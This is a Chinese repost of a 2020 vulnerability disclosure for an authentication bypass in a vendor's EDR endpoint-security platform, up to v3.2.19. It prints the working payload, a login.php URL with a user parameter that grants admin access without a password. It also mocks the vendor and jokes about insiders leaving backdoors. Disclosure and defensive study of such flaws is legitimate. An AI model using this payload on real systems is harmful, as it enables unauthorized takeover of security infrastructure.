又来个0day,建议杀个开发祭天吧!

发布日期:2020-08-20 浏览次数: 12496 次
漏洞编号: 暂无
漏洞名称: 某信服 EDR 任意用户登录漏洞
影响范围: EDR  <= v3.2.19
漏洞描述:
终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。
攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权限。

漏洞细节:

payload: https://ip/ui/login.php?user= 用户名随便写

例如: https://123.123.123.123:5000/ui/login.php?user=admin

只要用户名存在,比如管理员

如下图:

深X服是一家专注于企业级安全、云计算及IT基础设施的产品和服务供应商,拥有智安全、云计算和新IT三大业务品牌,致力于让用户的IT更简单、更安全、更有价值。
这是一个安全产品呀,怎么能有如何低级的漏洞呢?如果不杀个开发祭天,我都觉得是红队派过去卧底留的后门。
蓝队群里有人问我一个问题,我也回答不了,求解答!
给厂商开发程序的那个人如果开发的时候故意留一堆漏洞,然后等护网的时候突然提前离职,然后加入红队参与护网 上来直接放大招这样算不算作弊?

[参考链接]

https://www.yuque.com/pmiaowu/hcy2bz/fp4icw?from=groupmessage

 

转自:黑白之道

分享到:
×

微信扫一扫分享